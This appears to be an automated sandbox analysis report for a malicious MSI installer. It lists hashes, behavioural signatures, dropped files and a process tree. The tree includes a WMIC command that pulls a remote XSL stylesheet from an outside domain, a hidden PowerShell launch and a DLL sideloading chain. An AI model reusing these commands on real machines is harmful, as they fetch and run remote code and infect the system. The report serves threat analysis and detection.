Analysis

  • max time kernel
    113s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-10-2022 14:06

General

  • Target

    test/91B5DB3C0CCBD68BD04C24571E27F99D.msi

  • Size

    277KB

  • MD5

    91b5db3c0ccbd68bd04c24571e27f99d

  • SHA1

    b01cb4fe38315d41fcbe9c6278ebe4574496ab0d

  • SHA256

    ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130

  • SHA512

    9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7

  • SSDEEP

    3072:GErW9/kks5wgz88ereWn/7w05g049at7I3DGY5AvMcB3RUN46ILJ9+ZB5yOanoC:GEqckh8er1nzTD+3DGY5Aor9

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request ⋅ 4 IoCs
  • Executes dropped EXE ⋅ 3 IoCs
  • Checks computer location settings ⋅ 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file ⋅ 1 IoCs
  • Loads dropped DLL ⋅ 11 IoCs
  • Enumerates connected drives ⋅ 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service ⋅ 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory ⋅ 11 IoCs
  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses ⋅ 11 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs
  • Suspicious use of FindShellTrayWindow ⋅ 2 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 23 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    Enumerates connected drives
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    PID:2160
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    Enumerates connected drives
    Drops file in Windows directory
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding F64BBE2798DDDDFE6B7FE7D29A4FCC53
      Blocklisted process makes network request
      Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
        Blocklisted process makes network request
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:1056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          Blocklisted process makes network request
          Drops startup file
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:2980
          • C:\Users\Admin\AppData\Roaming\KmIg\nvsmartmaxapp.exe
            "C:\Users\Admin\AppData\Roaming\KmIg\nvsmartmaxapp.exe"
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of WriteProcessMemory
            PID:2284
            • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
              "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              Loads dropped DLL
              Suspicious behavior: EnumeratesProcesses
              PID:1072
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 8B4481134E3DE7737832B6F066560B87
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:3780
      • C:\Users\Admin\AppData\Local\Temp\lc1A5E.tmp
        "C:\Users\Admin\AppData\Local\Temp\lc1A5E.tmp"
        Executes dropped EXE
        PID:952
  • C:\Users\Admin\AppData\Roaming\KmIg\gup.exe
    C:\Users\Admin\AppData\Roaming\KmIg\gup.exe
    Executes dropped EXE
    Loads dropped DLL
    Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
      Loads dropped DLL
      PID:2136

Network

MITRE ATT&CK Matrix

  • Collection
  • Command and Control
  • Credential Access
  • Defense Evasion
  • Execution
  • Exfiltration
  • Impact
  • Initial Access
  • Lateral Movement
  • Persistence
  • Privilege Escalation

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Admin.ps1
    MD5     9a362dd5fb8679b63ca3996098a903ff
    SHA1    f86f4bdc36538c666ed60c7ad2091b9e07b6c7e3
    SHA256  30cc11279f166a46236eb838391df9d0d93fda8e818755a6fbe6168d13c7e8fc
    SHA512  d805eb926fd611cf81834d2f6fb27f025954365b636bc536c83247611106110dc404cbf96ce79ec96d76db443bcc24681903b786813e6ae407c1df7a59b71452
  • C:\Users\Admin\AppData\Local\Temp\lc1A5E.tmp
    MD5     55ffee241709ae96cf64cb0b9a96f0d7
    SHA1    b191810094dd2ee6b13c0d33458fafcd459681ae
    SHA256  64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf
    SHA512  01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07
  • C:\Users\Admin\AppData\Roaming\KmIg\NvSmartMax
    MD5     78ef53b2ad57536c74bbafece93a95e6
    SHA1    4b23eb993a5853013911a0310c1cbb834500ba94
    SHA256  371a793bdbe086871f1526000f878499b5fdd0426ffb6934745866483bbb6751
    SHA512  182079daa43cf65d29d277274cdb78b3383a61a518237c65bf4dcc29ba71e147c425f097d4473fecd455f4f9ab44c316bf1e292d045529b167bb852cb1babe71
  • C:\Users\Admin\AppData\Roaming\KmIg\NvSmartMax.dll
    MD5     5b861438e716d7c47632c4922be36795
    SHA1    499a5534020bd3ffa82097bf1edae7668367b6bc
    SHA256  eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4
    SHA512  9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be
  • C:\Users\Admin\AppData\Roaming\KmIg\gup.exe
    MD5     45c01734ed56c52797156620a5f8b414
    SHA1    fc37ac7523cf3b4020ec46d6a47bc26957e3c054
    SHA256  20ae23a6793e58761a28949dec7e910ce6479ab9c2b7bcbd7a1bb4df1171c503
    SHA512  4bd34101fff667a19d4884ef7f1b952dc236918138e1571aba8d5a0d691f914260a0233d6906168ed5c70f19e15f7328b1f82eb6247a1fe71395f6d4798ccf75
  • C:\Users\Admin\AppData\Roaming\KmIg\gup.xml
    MD5     b023cc4d768b34a5401f317479740a53
    SHA1    4ca45db707b120bca9cb6cd8404b9e6ecabdb2d2
    SHA256  d3e6404c7286961cbab82d4c49f82bcb166db9b5a13eacaa0eeb59a0709a0c14
    SHA512  82829b0d22cdb857cf1d299a9898d1862b61cd3c22eb05cb638391d3a54b12d5dd7a824ef838a9453e2c2b85c516eacad18b6d19221ad24f0bcedc2fff942e25
  • C:\Users\Admin\AppData\Roaming\KmIg\libcurl
    MD5     b4ad244ff08ca0a4413bead51fd9bb2c
    SHA1    61f2e2d9237406eecbd446e782549019404ef5cd
    SHA256  b150bc468e1df07540255450df863f5e309f7142f12edd5ed2d847ef8b05ab04
    SHA512  f56532d9c780ce61f41f0f3030760d4add99dd2bd34bf22acab15b0c497c68cefd8734576b84ce23f8f93eb80a6162ca683c0ef237512040d2515112cd75b800
  • C:\Users\Admin\AppData\Roaming\KmIg\libcurl.dll
    MD5     e880c09454a68b4714c6f184f7968070
    SHA1    4dba5fe842b01b641a7228a4c8f805e4627c0012
    SHA256  c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82
    SHA512  712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5
  • C:\Users\Admin\AppData\Roaming\KmIg\nvsmartmaxapp.exe
    MD5     df3e0e32d1e1fb50cc292aebc5e5b322
    SHA1    12c93bb262696314123562f8a4b158074c9f6b95
    SHA256  6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412
    SHA512  71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d
  • C:\Windows\Installer\MSI1A02.tmp
    MD5     9f1e5d66c2889018daef4aef604eebc4
    SHA1    b80294261c8a1635e16e14f55a3d76889ff2c857
    SHA256  02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222
    SHA512  8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b
  • C:\Windows\Installer\MSI2108.tmp
    MD5     9f1e5d66c2889018daef4aef604eebc4
    SHA1    b80294261c8a1635e16e14f55a3d76889ff2c857
    SHA256  02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222
    SHA512  8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b
  • C:\Windows\Installer\MSIDA48.tmp
    MD5     9f1e5d66c2889018daef4aef604eebc4
    SHA1    b80294261c8a1635e16e14f55a3d76889ff2c857
    SHA256  02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222
    SHA512  8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b
  • C:\Windows\Installer\MSIFE99.tmp
    MD5     9f1e5d66c2889018daef4aef604eebc4
    SHA1    b80294261c8a1635e16e14f55a3d76889ff2c857
    SHA256  02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222
    SHA512  8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b
  • memory/952-146-0x0000000000000000-mapping.dmp
  • memory/1056-133-0x0000000000000000-mapping.dmp
  • memory/1072-160-0x0000000002740000-0x0000000002ABD000-memory.dmp
  • memory/1072-157-0x0000000000000000-mapping.dmp
  • memory/1304-167-0x0000000000A30000-0x0000000000B53000-memory.dmp
  • memory/2284-151-0x0000000000000000-mapping.dmp
  • memory/2496-132-0x0000000000000000-mapping.dmp
  • memory/2980-143-0x00007FFDDFE50000-0x00007FFDE0911000-memory.dmp
  • memory/2980-138-0x00007FFDDFE50000-0x00007FFDE0911000-memory.dmp
  • memory/2980-136-0x000001A34F470000-0x000001A34F492000-memory.dmp
  • memory/2980-135-0x0000000000000000-mapping.dmp
  • memory/2980-155-0x00007FFDDFE50000-0x00007FFDE0911000-memory.dmp
  • memory/3780-134-0x0000000000000000-mapping.dmp